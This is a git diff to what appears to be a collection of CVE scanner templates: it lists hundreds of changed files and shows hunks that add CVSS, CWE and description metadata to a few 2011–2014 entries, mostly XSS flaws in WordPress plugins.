cves/2017/CVE-2017-12635.yaml | 7 ++++++- cves/2017/CVE-2017-12637.yaml | 5 +++++ cves/2017/CVE-2017-12794.yaml | 5 +++++ cves/2017/CVE-2017-14535.yaml | 6 ++++++ cves/2017/CVE-2017-14537.yaml | 5 +++++ cves/2017/CVE-2017-14651.yaml | 9 +++++++++ cves/2017/CVE-2017-14849.yaml | 9 +++++++++ cves/2017/CVE-2017-15647.yaml | 7 ++++++- cves/2017/CVE-2017-15715.yaml | 5 +++++ cves/2017/CVE-2017-15944.yaml | 6 +++++- cves/2017/CVE-2017-16806.yaml | 6 ++++++ cves/2017/CVE-2017-16877.yaml | 5 +++++ cves/2017/CVE-2017-17043.yaml | 5 +++++ cves/2017/CVE-2017-17059.yaml | 5 +++++ cves/2017/CVE-2017-17451.yaml | 5 +++++ cves/2017/CVE-2017-17562.yaml | 5 +++++ cves/2017/CVE-2017-18024.yaml | 5 +++++ cves/2017/CVE-2017-18536.yaml | 5 +++++ cves/2017/CVE-2017-18638.yaml | 5 +++++ cves/2017/CVE-2017-3506.yaml | 4 ++++ cves/2017/CVE-2017-3528.yaml | 8 +++++++- cves/2017/CVE-2017-3881.yaml | 5 +++++ cves/2017/CVE-2017-4011.yaml | 5 +++++ cves/2017/CVE-2017-5487.yaml | 7 ++++++- cves/2017/CVE-2017-5521.yaml | 7 ++++++- cves/2017/CVE-2017-5638.yaml | 5 +++++ cves/2017/CVE-2017-6090.yaml | 8 +++++++- cves/2017/CVE-2017-7269.yaml | 5 +++++ cves/2017/CVE-2017-7391.yaml | 5 +++++ cves/2017/CVE-2017-7615.yaml | 5 +++++ cves/2017/CVE-2017-7921.yaml | 7 ++++++- cves/2017/CVE-2017-8917.yaml | 7 ++++++- cves/2017/CVE-2017-9140.yaml | 5 +++++ cves/2017/CVE-2017-9288.yaml | 5 +++++ cves/2017/CVE-2017-9506.yaml | 7 ++++++- cves/2017/CVE-2017-9791.yaml | 5 +++++ cves/2017/CVE-2017-9805.yaml | 7 ++++++- cves/2017/CVE-2017-9822.yaml | 5 +++++ cves/2017/CVE-2017-9841.yaml | 7 ++++++- cves/2018/CVE-2018-0296.yaml | 8 +++++++- cves/2018/CVE-2018-1000129.yaml | 12 +++++++++++- cves/2018/CVE-2018-1000130.yaml | 8 ++++++++ cves/2018/CVE-2018-1000533.yaml | 5 +++++ cves/2018/CVE-2018-1000600.yaml | 7 ++++++- cves/2018/CVE-2018-1000861.yaml | 6 ++++++ cves/2018/CVE-2018-10095.yaml | 5 +++++ cves/2018/CVE-2018-10141.yaml | 5 +++++ cves/2018/CVE-2018-10822.yaml | 5 +++++ cves/2018/CVE-2018-11409.yaml | 6 ++++++ cves/2018/CVE-2018-11709.yaml | 5 +++++ cves/2018/CVE-2018-11759.yaml | 8 +++++++- cves/2018/CVE-2018-11776.yaml | 8 +++++++- cves/2018/CVE-2018-11784.yaml | 5 +++++ cves/2018/CVE-2018-12031.yaml | 7 ++++++- cves/2018/CVE-2018-1207.yaml | 5 +++++ cves/2018/CVE-2018-12095.yaml | 5 +++++ cves/2018/CVE-2018-1247.yaml | 13 ++++++++++++- cves/2018/CVE-2018-12613.yaml | 8 +++++++- cves/2018/CVE-2018-12634.yaml | 7 ++++++- cves/2018/CVE-2018-1271.yaml | 8 +++++++- cves/2018/CVE-2018-1273.yaml | 5 +++++ cves/2018/CVE-2018-1335.yaml | 7 ++++++- cves/2018/CVE-2018-13379.yaml | 11 ++++++++++- cves/2018/CVE-2018-13380.yaml | 5 +++++ cves/2018/CVE-2018-14013.yaml | 5 +++++ cves/2018/CVE-2018-14064.yaml | 7 ++++++- cves/2018/CVE-2018-14574.yaml | 15 ++++++++++++++- cves/2018/CVE-2018-14728.yaml | 11 ++++++++++- cves/2018/CVE-2018-15473.yaml | 7 ++++++- cves/2018/CVE-2018-15517.yaml | 7 ++++++- cves/2018/CVE-2018-15535.yaml | 7 ++++++- cves/2018/CVE-2018-15745.yaml | 5 +++++ cves/2018/CVE-2018-16059.yaml | 6 ++++++ cves/2018/CVE-2018-16167.yaml | 5 +++++ cves/2018/CVE-2018-16283.yaml | 6 ++++++ cves/2018/CVE-2018-16288.yaml | 5 +++++ cves/2018/CVE-2018-16299.yaml | 5 +++++ cves/2018/CVE-2018-16668.yaml | 5 +++++ cves/2018/CVE-2018-16670.yaml | 5 +++++ cves/2018/CVE-2018-16671.yaml | 5 +++++ cves/2018/CVE-2018-16763.yaml | 6 ++++++ cves/2018/CVE-2018-17246.yaml | 7 ++++++- cves/2018/CVE-2018-17254.yaml | 7 ++++++- cves/2018/CVE-2018-17431.yaml | 5 +++++ cves/2018/CVE-2018-18069.yaml | 7 +++++++ cves/2018/CVE-2018-18775.yaml | 5 +++++ cves/2018/CVE-2018-18777.yaml | 7 ++++++- cves/2018/CVE-2018-18778.yaml | 7 ++++++- cves/2018/CVE-2018-19386.yaml | 6 ++++++ cves/2018/CVE-2018-19439.yaml | 11 ++++++++++- cves/2018/CVE-2018-19458.yaml | 5 +++++ cves/2018/CVE-2018-20462.yaml | 5 +++++ cves/2018/CVE-2018-20470.yaml | 5 +++++ cves/2018/CVE-2018-20824.yaml | 7 +++++++ cves/2018/CVE-2018-20985.yaml | 7 ++++++- cves/2018/CVE-2018-2392.yaml | 5 +++++ cves/2018/CVE-2018-2628.yaml | 8 +++++++- cves/2018/CVE-2018-2791.yaml | 11 ++++++++++- cves/2018/CVE-2018-2893.yaml | 7 ++++++- cves/2018/CVE-2018-2894.yaml | 4 ++++ cves/2018/CVE-2018-3167.yaml | 10 +++++++++- cves/2018/CVE-2018-3714.yaml | 8 +++++++- cves/2018/CVE-2018-3760.yaml | 5 +++++ cves/2018/CVE-2018-3810.yaml | 6 ++++++ cves/2018/CVE-2018-5230.yaml | 8 ++++++++ cves/2018/CVE-2018-5233.yaml | 5 +++++ cves/2018/CVE-2018-5316.yaml | 5 +++++ cves/2018/CVE-2018-6008.yaml | 5 +++++ cves/2018/CVE-2018-6910.yaml | 5 +++++ cves/2018/CVE-2018-7251.yaml | 14 +++++++++++++- cves/2018/CVE-2018-7422.yaml | 5 +++++ cves/2018/CVE-2018-7490.yaml | 10 ++++++++++ cves/2018/CVE-2018-7600.yaml | 6 ++++++ cves/2018/CVE-2018-7700.yaml | 6 ++++++ cves/2018/CVE-2018-8006.yaml | 17 +++++++++++++++++ cves/2018/CVE-2018-8033.yaml | 7 +++++++ cves/2018/CVE-2018-8715.yaml | 5 +++++ cves/2018/CVE-2018-8719.yaml | 5 +++++ cves/2018/CVE-2018-8770.yaml | 5 +++++ cves/2018/CVE-2018-9118.yaml | 5 +++++ cves/2018/CVE-2018-9995.yaml | 6 +++++- cves/2019/CVE-2019-0193.yaml | 7 ++++++- cves/2019/CVE-2019-0221.yaml | 7 ++++++- cves/2019/CVE-2019-0230.yaml | 7 ++++++- cves/2019/CVE-2019-10068.yaml | 5 +++++ cves/2019/CVE-2019-10092.yaml | 5 +++++ cves/2019/CVE-2019-1010287.yaml | 8 +++++++- cves/2019/CVE-2019-10475.yaml | 10 ++++++++++ cves/2019/CVE-2019-11013.yaml | 8 +++++++- cves/2019/CVE-2019-11248.yaml | 7 ++++++- cves/2019/CVE-2019-11510.yaml | 8 +++++++- cves/2019/CVE-2019-11580.yaml | 4 ++++ cves/2019/CVE-2019-11581.yaml | 5 +++++ cves/2019/CVE-2019-11869.yaml | 5 +++++ cves/2019/CVE-2019-12276.yaml | 5 +++++ cves/2019/CVE-2019-12314.yaml | 7 ++++++- cves/2019/CVE-2019-12461.yaml | 5 +++++ cves/2019/CVE-2019-12593.yaml | 5 +++++ cves/2019/CVE-2019-12616.yaml | 5 +++++ cves/2019/CVE-2019-12725.yaml | 5 +++++ cves/2019/CVE-2019-13101.yaml | 5 +++++ cves/2019/CVE-2019-13462.yaml | 5 +++++ cves/2019/CVE-2019-14205.yaml | 5 +++++ cves/2019/CVE-2019-14223.yaml | 7 ++++++- cves/2019/CVE-2019-14312.yaml | 7 ++++++- cves/2019/CVE-2019-14322.yaml | 9 +++++++++ cves/2019/CVE-2019-14470.yaml | 6 ++++++ cves/2019/CVE-2019-14696.yaml | 6 ++++++ cves/2019/CVE-2019-14974.yaml | 10 +++++++++- cves/2019/CVE-2019-15043.yaml | 7 ++++++- cves/2019/CVE-2019-15107.yaml | 7 ++++++- cves/2019/CVE-2019-15501.yaml | 6 ++++++ cves/2019/CVE-2019-15713.yaml | 5 +++++ cves/2019/CVE-2019-15858.yaml | 5 +++++ cves/2019/CVE-2019-15859.yaml | 5 +++++ cves/2019/CVE-2019-15889.yaml | 5 +++++ cves/2019/CVE-2019-16097.yaml | 7 ++++++- cves/2019/CVE-2019-16278.yaml | 6 ++++++ cves/2019/CVE-2019-16313.yaml | 5 +++++ cves/2019/CVE-2019-16332.yaml | 5 +++++ cves/2019/CVE-2019-16525.yaml | 5 +++++ cves/2019/CVE-2019-1653.yaml | 5 +++++ cves/2019/CVE-2019-16662.yaml | 6 ++++++ cves/2019/CVE-2019-16759.yaml | 8 +++++++- cves/2019/CVE-2019-16920.yaml | 5 +++++ cves/2019/CVE-2019-17270.yaml | 7 ++++++- cves/2019/CVE-2019-17382.yaml | 5 +++++ cves/2019/CVE-2019-17503.yaml | 5 +++++ cves/2019/CVE-2019-17506.yaml | 5 +++++ cves/2019/CVE-2019-17538.yaml | 6 ++++++ cves/2019/CVE-2019-17558.yaml | 8 +++++++- cves/2019/CVE-2019-18393.yaml | 7 ++++++- cves/2019/CVE-2019-18394.yaml | 5 +++++ cves/2019/CVE-2019-18818.yaml | 5 +++++ cves/2019/CVE-2019-19134.yaml | 5 +++++ cves/2019/CVE-2019-19368.yaml | 5 +++++ cves/2019/CVE-2019-19781.yaml | 7 ++++++- cves/2019/CVE-2019-19908.yaml | 5 +++++ cves/2019/CVE-2019-19985.yaml | 5 +++++ cves/2019/CVE-2019-20085.yaml | 5 +++++ cves/2019/CVE-2019-20141.yaml | 5 +++++ cves/2019/CVE-2019-2588.yaml | 6 +++++- cves/2019/CVE-2019-2616.yaml | 4 ++++ cves/2019/CVE-2019-2725.yaml | 5 +++++ cves/2019/CVE-2019-2767.yaml | 4 ++++ cves/2019/CVE-2019-3396.yaml | 7 ++++++- cves/2019/CVE-2019-3401.yaml | 7 ++++++- cves/2019/CVE-2019-3402.yaml | 5 +++++ cves/2019/CVE-2019-3403.yaml | 5 +++++ cves/2019/CVE-2019-3799.yaml | 7 ++++++- cves/2019/CVE-2019-5127.yaml | 5 +++++ cves/2019/CVE-2019-5418.yaml | 6 +++++- cves/2019/CVE-2019-6112.yaml | 5 +++++ cves/2019/CVE-2019-6340.yaml | 7 ++++++- cves/2019/CVE-2019-6715.yaml | 7 +++++++ cves/2019/CVE-2019-7219.yaml | 7 ++++++- cves/2019/CVE-2019-7238.yaml | 5 +++++ cves/2019/CVE-2019-7254.yaml | 6 ++++++ cves/2019/CVE-2019-7256.yaml | 5 +++++ cves/2019/CVE-2019-7275.yaml | 8 +++++++- cves/2019/CVE-2019-7481.yaml | 5 +++++ cves/2019/CVE-2019-7609.yaml | 5 +++++ cves/2019/CVE-2019-8442.yaml | 6 +++++- cves/2019/CVE-2019-8446.yaml | 8 ++++++++ cves/2019/CVE-2019-8449.yaml | 5 +++++ cves/2019/CVE-2019-8451.yaml | 5 +++++ cves/2019/CVE-2019-8903.yaml | 5 +++++ cves/2019/CVE-2019-8937.yaml | 6 ++++++ cves/2019/CVE-2019-8982.yaml | 7 ++++++- cves/2019/CVE-2019-9041.yaml | 5 +++++ cves/2019/CVE-2019-9618.yaml | 7 ++++++- cves/2019/CVE-2019-9670.yaml | 12 ++++++++++++ cves/2019/CVE-2019-9733.yaml | 4 ++++ cves/2019/CVE-2019-9955.yaml | 7 ++++++- cves/2019/CVE-2019-9978.yaml | 7 ++++++- cves/2020/CVE-2020-0618.yaml | 5 +++++ cves/2020/CVE-2020-10148.yaml | 7 ++++++- cves/2020/CVE-2020-10546.yaml | 7 ++++++- cves/2020/CVE-2020-10547.yaml | 7 ++++++- cves/2020/CVE-2020-10548.yaml | 7 ++++++- cves/2020/CVE-2020-10549.yaml | 7 ++++++- cves/2020/CVE-2020-11034.yaml | 7 ++++++- cves/2020/CVE-2020-11110.yaml | 5 +++++ cves/2020/CVE-2020-11455.yaml | 7 ++++++- cves/2020/CVE-2020-11547.yaml | 5 +++++ cves/2020/CVE-2020-11710.yaml | 6 +++++- cves/2020/CVE-2020-11738.yaml | 5 +++++ cves/2020/CVE-2020-11853.yaml | 4 ++++ cves/2020/CVE-2020-11854.yaml | 5 +++++ cves/2020/CVE-2020-11930.yaml | 5 +++++ cves/2020/CVE-2020-11978.yaml | 5 +++++ cves/2020/CVE-2020-11991.yaml | 5 +++++ cves/2020/CVE-2020-12054.yaml | 5 +++++ cves/2020/CVE-2020-12116.yaml | 5 +++++ cves/2020/CVE-2020-12720.yaml | 5 +++++ cves/2020/CVE-2020-12800.yaml | 5 +++++ cves/2020/CVE-2020-13117.yaml | 5 +++++ cves/2020/CVE-2020-13167.yaml | 5 +++++ cves/2020/CVE-2020-13483.yaml | 7 ++++++- cves/2020/CVE-2020-13700.yaml | 5 +++++ cves/2020/CVE-2020-13927.yaml | 8 ++++++++ cves/2020/CVE-2020-13937.yaml | 5 +++++ cves/2020/CVE-2020-13942.yaml | 5 +++++ cves/2020/CVE-2020-14092.yaml | 5 +++++ cves/2020/CVE-2020-14179.yaml | 4 ++++ cves/2020/CVE-2020-14181.yaml | 5 +++++ cves/2020/CVE-2020-14413.yaml | 5 +++++ cves/2020/CVE-2020-14864.yaml | 4 ++++ cves/2020/CVE-2020-14882.yaml | 4 ++++ cves/2020/CVE-2020-14883.yaml | 6 +++++- cves/2020/CVE-2020-15129.yaml | 5 +++++ cves/2020/CVE-2020-15148.yaml | 8 +++++++- cves/2020/CVE-2020-15227.yaml | 7 ++++++- cves/2020/CVE-2020-15500.yaml | 6 ++++++ cves/2020/CVE-2020-15505.yaml | 4 ++++ cves/2020/CVE-2020-15568.yaml | 5 +++++ cves/2020/CVE-2020-15920.yaml | 5 +++++ cves/2020/CVE-2020-16139.yaml | 6 +++++- cves/2020/CVE-2020-16846.yaml | 5 +++++ cves/2020/CVE-2020-16952.yaml | 7 ++++++- cves/2020/CVE-2020-17362.yaml | 5 +++++ cves/2020/CVE-2020-17453.yaml | 5 +++++ cves/2020/CVE-2020-17496.yaml | 5 +++++ cves/2020/CVE-2020-17505.yaml | 5 +++++ cves/2020/CVE-2020-17506.yaml | 5 +++++ cves/2020/CVE-2020-17518.yaml | 7 ++++++- cves/2020/CVE-2020-17519.yaml | 5 +++++ cves/2020/CVE-2020-17530.yaml | 5 +++++ cves/2020/CVE-2020-1938.yaml | 8 +++++++- cves/2020/CVE-2020-1943.yaml | 5 +++++ cves/2020/CVE-2020-19625.yaml | 6 +++++- cves/2020/CVE-2020-2036.yaml | 7 ++++++- cves/2020/CVE-2020-2096.yaml | 5 +++++ cves/2020/CVE-2020-21224.yaml | 5 +++++ cves/2020/CVE-2020-2140.yaml | 5 +++++ cves/2020/CVE-2020-22840.yaml | 11 ++++++++++- cves/2020/CVE-2020-23517.yaml | 5 +++++ cves/2020/CVE-2020-23972.yaml | 5 +++++ cves/2020/CVE-2020-24148.yaml | 5 +++++ cves/2020/CVE-2020-24186.yaml | 5 +++++ cves/2020/CVE-2020-24223.yaml | 5 +++++ cves/2020/CVE-2020-24312.yaml | 5 +++++ cves/2020/CVE-2020-24550.yaml | 5 +++++ cves/2020/CVE-2020-24571.yaml | 5 +++++ cves/2020/CVE-2020-24579.yaml | 7 ++++++- cves/2020/CVE-2020-24949.yaml | 4 ++++ cves/2020/CVE-2020-25078.yaml | 4 ++++ cves/2020/CVE-2020-25213.yaml | 5 +++++ cves/2020/CVE-2020-25223.yaml | 4 ++++ cves/2020/CVE-2020-25495.yaml | 5 +++++ cves/2020/CVE-2020-25506.yaml | 5 +++++ cves/2020/CVE-2020-2551.yaml | 4 ++++ cves/2020/CVE-2020-25540.yaml | 7 ++++++- cves/2020/CVE-2020-26153.yaml | 5 +++++ cves/2020/CVE-2020-26214.yaml | 5 +++++ cves/2020/CVE-2020-26919.yaml | 4 ++++ cves/2020/CVE-2020-26948.yaml | 5 +++++ cves/2020/CVE-2020-27361.yaml | 5 +++++ cves/2020/CVE-2020-27735.yaml | 5 +++++ cves/2020/CVE-2020-27866.yaml | 5 +++++ cves/2020/CVE-2020-27982.yaml | 5 +++++ cves/2020/CVE-2020-27986.yaml | 7 ++++++- cves/2020/CVE-2020-28188.yaml | 5 +++++ cves/2020/CVE-2020-28208.yaml | 5 +++++ cves/2020/CVE-2020-28871.yaml | 5 +++++ cves/2020/CVE-2020-28976.yaml | 7 ++++++- cves/2020/CVE-2020-29164.yaml | 5 +++++ cves/2020/CVE-2020-29227.yaml | 6 +++++- cves/2020/CVE-2020-29395.yaml | 5 +++++ cves/2020/CVE-2020-29453.yaml | 5 +++++ cves/2020/CVE-2020-3187.yaml | 7 ++++++- cves/2020/CVE-2020-3452.yaml | 7 ++++++- cves/2020/CVE-2020-35338.yaml | 5 +++++ cves/2020/CVE-2020-35476.yaml | 5 +++++ cves/2020/CVE-2020-35489.yaml | 5 +++++ cves/2020/CVE-2020-35580.yaml | 5 +++++ cves/2020/CVE-2020-35598.yaml | 5 +++++ cves/2020/CVE-2020-35713.yaml | 5 +++++ cves/2020/CVE-2020-35729.yaml | 5 +++++ cves/2020/CVE-2020-35736.yaml | 5 +++++ cves/2020/CVE-2020-35774.yaml | 5 +++++ cves/2020/CVE-2020-3580.yaml | 5 +++++ cves/2020/CVE-2020-35846.yaml | 5 +++++ cves/2020/CVE-2020-35847.yaml | 5 +++++ cves/2020/CVE-2020-35848.yaml | 5 +++++ cves/2020/CVE-2020-35951.yaml | 5 +++++ cves/2020/CVE-2020-36112.yaml | 5 +++++ cves/2020/CVE-2020-36289.yaml | 5 +++++ cves/2020/CVE-2020-4463.yaml | 5 +++++ cves/2020/CVE-2020-5284.yaml | 5 +++++ cves/2020/CVE-2020-5307.yaml | 5 +++++ cves/2020/CVE-2020-5405.yaml | 7 ++++++- cves/2020/CVE-2020-5410.yaml | 5 +++++ cves/2020/CVE-2020-5412.yaml | 5 +++++ cves/2020/CVE-2020-5776.yaml | 5 +++++ cves/2020/CVE-2020-5777.yaml | 7 ++++++- cves/2020/CVE-2020-5847.yaml | 7 ++++++- cves/2020/CVE-2020-5902.yaml | 7 ++++++- cves/2020/CVE-2020-6207.yaml | 5 +++++ cves/2020/CVE-2020-6287.yaml | 5 +++++ cves/2020/CVE-2020-6308.yaml | 6 ++++++ cves/2020/CVE-2020-6637.yaml | 7 ++++++- cves/2020/CVE-2020-7209.yaml | 4 ++++ cves/2020/CVE-2020-7247.yaml | 6 ++++++ cves/2020/CVE-2020-7318.yaml | 5 +++++ cves/2020/CVE-2020-7796.yaml | 5 +++++ cves/2020/CVE-2020-7961.yaml | 5 +++++ cves/2020/CVE-2020-8091.yaml | 5 +++++ cves/2020/CVE-2020-8115.yaml | 5 +++++ cves/2020/CVE-2020-8163.yaml | 5 +++++ cves/2020/CVE-2020-8191.yaml | 7 ++++++- cves/2020/CVE-2020-8193.yaml | 7 ++++++- cves/2020/CVE-2020-8194.yaml | 7 ++++++- cves/2020/CVE-2020-8209.yaml | 5 +++++ cves/2020/CVE-2020-8512.yaml | 5 +++++ cves/2020/CVE-2020-8515.yaml | 5 +++++ cves/2020/CVE-2020-8771.yaml | 6 ++++++ cves/2020/CVE-2020-8813.yaml | 7 ++++++- cves/2020/CVE-2020-8982.yaml | 5 +++++ cves/2020/CVE-2020-9036.yaml | 6 ++++++ cves/2020/CVE-2020-9047.yaml | 5 +++++ cves/2020/CVE-2020-9054.yaml | 5 +++++ cves/2020/CVE-2020-9315.yaml | 6 ++++++ cves/2020/CVE-2020-9344.yaml | 5 +++++ cves/2020/CVE-2020-9376.yaml | 5 +++++ cves/2020/CVE-2020-9402.yaml | 5 +++++ cves/2020/CVE-2020-9425.yaml | 5 +++++ cves/2020/CVE-2020-9483.yaml | 5 +++++ cves/2020/CVE-2020-9484.yaml | 5 +++++ cves/2020/CVE-2020-9490.yaml | 7 ++++++- cves/2020/CVE-2020-9496.yaml | 5 +++++ cves/2020/CVE-2020-9757.yaml | 10 ++++++++++ cves/2021/CVE-2021-1497.yaml | 5 +++++ cves/2021/CVE-2021-20090.yaml | 5 +++++ cves/2021/CVE-2021-20091.yaml | 6 +++++- cves/2021/CVE-2021-20092.yaml | 7 ++++++- cves/2021/CVE-2021-20114.yaml | 5 +++++ cves/2021/CVE-2021-21234.yaml | 5 +++++ cves/2021/CVE-2021-21307.yaml | 5 +++++ cves/2021/CVE-2021-21315.yaml | 5 +++++ cves/2021/CVE-2021-21389.yaml | 7 ++++++- cves/2021/CVE-2021-21402.yaml | 7 ++++++- cves/2021/CVE-2021-21479.yaml | 5 +++++ cves/2021/CVE-2021-21801.yaml | 5 +++++ cves/2021/CVE-2021-21802.yaml | 5 +++++ cves/2021/CVE-2021-21803.yaml | 5 +++++ cves/2021/CVE-2021-21816.yaml | 5 +++++ cves/2021/CVE-2021-21972.yaml | 5 +++++ cves/2021/CVE-2021-21975.yaml | 7 ++++++- cves/2021/CVE-2021-21978.yaml | 5 +++++ cves/2021/CVE-2021-21985.yaml | 5 +++++ cves/2021/CVE-2021-22122.yaml | 5 +++++ cves/2021/CVE-2021-22145.yaml | 5 +++++ cves/2021/CVE-2021-22214.yaml | 7 ++++++- cves/2021/CVE-2021-22873.yaml | 7 ++++++- cves/2021/CVE-2021-22986.yaml | 4 ++++ cves/2021/CVE-2021-23241.yaml | 5 +++++ cves/2021/CVE-2021-24146.yaml | 5 +++++ cves/2021/CVE-2021-24176.yaml | 5 +++++ cves/2021/CVE-2021-24210.yaml | 7 ++++++- cves/2021/CVE-2021-24235.yaml | 6 ++++++ cves/2021/CVE-2021-24237.yaml | 5 +++++ cves/2021/CVE-2021-24285.yaml | 5 +++++ cves/2021/CVE-2021-24288.yaml | 5 +++++ cves/2021/CVE-2021-24291.yaml | 5 +++++ cves/2021/CVE-2021-24298.yaml | 5 +++++ cves/2021/CVE-2021-24316.yaml | 5 +++++ cves/2021/CVE-2021-24320.yaml | 5 +++++ cves/2021/CVE-2021-24335.yaml | 5 +++++ cves/2021/CVE-2021-24340.yaml | 7 ++++++- cves/2021/CVE-2021-24387.yaml | 5 +++++ cves/2021/CVE-2021-24389.yaml | 5 +++++ cves/2021/CVE-2021-24406.yaml | 7 ++++++- cves/2021/CVE-2021-24472.yaml | 7 ++++++- cves/2021/CVE-2021-24495.yaml | 5 +++++ cves/2021/CVE-2021-24498.yaml | 5 +++++ cves/2021/CVE-2021-25281.yaml | 5 +++++ cves/2021/CVE-2021-25646.yaml | 7 ++++++- cves/2021/CVE-2021-26084.yaml | 5 +++++ cves/2021/CVE-2021-26086.yaml | 5 +++++ cves/2021/CVE-2021-26295.yaml | 5 +++++ cves/2021/CVE-2021-26475.yaml | 5 +++++ cves/2021/CVE-2021-26710.yaml | 5 +++++ cves/2021/CVE-2021-26722.yaml | 5 +++++ cves/2021/CVE-2021-26723.yaml | 5 +++++ cves/2021/CVE-2021-26812.yaml | 5 +++++ cves/2021/CVE-2021-26855.yaml | 4 ++++ cves/2021/CVE-2021-27132.yaml | 10 +++++++++- cves/2021/CVE-2021-27330.yaml | 5 +++++ cves/2021/CVE-2021-27651.yaml | 5 +++++ cves/2021/CVE-2021-27850.yaml | 5 +++++ cves/2021/CVE-2021-27905.yaml | 7 ++++++- cves/2021/CVE-2021-28149.yaml | 5 +++++ cves/2021/CVE-2021-28150.yaml | 5 +++++ cves/2021/CVE-2021-28151.yaml | 5 +++++ cves/2021/CVE-2021-28164.yaml | 5 +++++ cves/2021/CVE-2021-28169.yaml | 5 +++++ cves/2021/CVE-2021-28918.yaml | 5 +++++ cves/2021/CVE-2021-28937.yaml | 7 ++++++- cves/2021/CVE-2021-29156.yaml | 5 +++++ cves/2021/CVE-2021-29203.yaml | 5 +++++ cves/2021/CVE-2021-29441.yaml | 7 ++++++- cves/2021/CVE-2021-29442.yaml | 5 +++++ cves/2021/CVE-2021-29484.yaml | 5 +++++ cves/2021/CVE-2021-29622.yaml | 5 +++++ cves/2021/CVE-2021-29625.yaml | 5 +++++ cves/2021/CVE-2021-30151.yaml | 7 ++++++- cves/2021/CVE-2021-3017.yaml | 4 ++++ cves/2021/CVE-2021-3019.yaml | 7 ++++++- cves/2021/CVE-2021-30461.yaml | 5 +++++ cves/2021/CVE-2021-31249.yaml | 4 ++++ cves/2021/CVE-2021-31250.yaml | 5 +++++ cves/2021/CVE-2021-3129.yaml | 4 ++++ cves/2021/CVE-2021-31537.yaml | 5 +++++ cves/2021/CVE-2021-31581.yaml | 6 ++++++ cves/2021/CVE-2021-31755.yaml | 5 +++++ cves/2021/CVE-2021-31856.yaml | 5 +++++ cves/2021/CVE-2021-32030.yaml | 7 ++++++- cves/2021/CVE-2021-3223.yaml | 5 +++++ cves/2021/CVE-2021-32305.yaml | 5 +++++ cves/2021/CVE-2021-32819.yaml | 6 +++++- cves/2021/CVE-2021-32820.yaml | 8 +++++++- cves/2021/CVE-2021-3297.yaml | 5 +++++ cves/2021/CVE-2021-33221.yaml | 7 ++++++- cves/2021/CVE-2021-33564.yaml | 6 ++++++ cves/2021/CVE-2021-3374.yaml | 5 +++++ cves/2021/CVE-2021-3377.yaml | 5 +++++ cves/2021/CVE-2021-3378.yaml | 5 +++++ cves/2021/CVE-2021-33807.yaml | 5 +++++ cves/2021/CVE-2021-33904.yaml | 5 +++++ cves/2021/CVE-2021-34370.yaml | 5 +++++ cves/2021/CVE-2021-34429.yaml | 5 +++++ cves/2021/CVE-2021-34473.yaml | 4 ++++ cves/2021/CVE-2021-34621.yaml | 6 ++++++ cves/2021/CVE-2021-35464.yaml | 5 +++++ cves/2021/CVE-2021-36380.yaml | 5 +++++ cves/2021/CVE-2021-37216.yaml | 5 +++++ cves/2021/CVE-2021-37538.yaml | 7 ++++++- cves/2021/CVE-2021-37573.yaml | 6 ++++++ cves/2021/CVE-2021-37704.yaml | 7 ++++++- cves/2021/CVE-2021-38702.yaml | 5 +++++ cves/2021/CVE-2021-38751.yaml | 5 +++++ 547 files changed, 2998 insertions(+), 143 deletions(-) diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml index 05714d8b90..1fe124e5d4 100644 --- a/cves/2011/CVE-2011-4336.yaml +++ b/cves/2011/CVE-2011-4336.yaml @@ -10,6 +10,11 @@ info: - https://www.securityfocus.com/bid/48806/info - https://seclists.org/bugtraq/2011/Nov/140 tags: cve,cve2011,xss,tikiwiki + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2011-4336 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2012/CVE-2012-4242.yaml b/cves/2012/CVE-2012-4242.yaml index d7ca7ac309..ed80489fb4 100644 --- a/cves/2012/CVE-2012-4242.yaml +++ b/cves/2012/CVE-2012-4242.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242 tags: cve,cve2012,wordpress,xss,wp-plugin + description: "Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page." requests: - method: GET diff --git a/cves/2013/CVE-2013-2287.yaml b/cves/2013/CVE-2013-2287.yaml index 05ae7013e2..4b827a6e88 100644 --- a/cves/2013/CVE-2013-2287.yaml +++ b/cves/2013/CVE-2013-2287.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287 tags: cve,cve2013,wordpress,xss,wp-plugin + description: "Multiple cross-site scripting (XSS) vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter." requests: - method: GET diff --git a/cves/2013/CVE-2013-3526.yaml b/cves/2013/CVE-2013-3526.yaml index b081219b53..a65162e1be 100644 --- a/cves/2013/CVE-2013-3526.yaml +++ b/cves/2013/CVE-2013-3526.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526 tags: cve,cve2013,wordpress,xss,wp-plugin + description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." requests: - method: GET diff --git a/cves/2014/CVE-2014-2323.yaml b/cves/2014/CVE-2014-2323.yaml index e4dff03126..61d21ce54c 100644 --- a/cves/2014/CVE-2014-2323.yaml +++ b/cves/2014/CVE-2014-2323.yaml @@ -7,6 +7,11 @@ info: author: geeknik severity: critical tags: cve,cve2014,sqli,lighttpd + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2014-2323 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2014/CVE-2014-3744.yaml b/cves/2014/CVE-2014-3744.yaml index d25a27bc60..b593394d70 100644 --- a/cves/2014/CVE-2014-3744.yaml +++ b/cves/2014/CVE-2014-3744.yaml @@ -9,6 +9,11 @@ info: - https://snyk.io/vuln/npm:st:20140206 severity: high tags: cve,cve2014,lfi,nodejs,st + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2014-3744 + cwe-id: CWE-22 requests: - method: GET diff --git 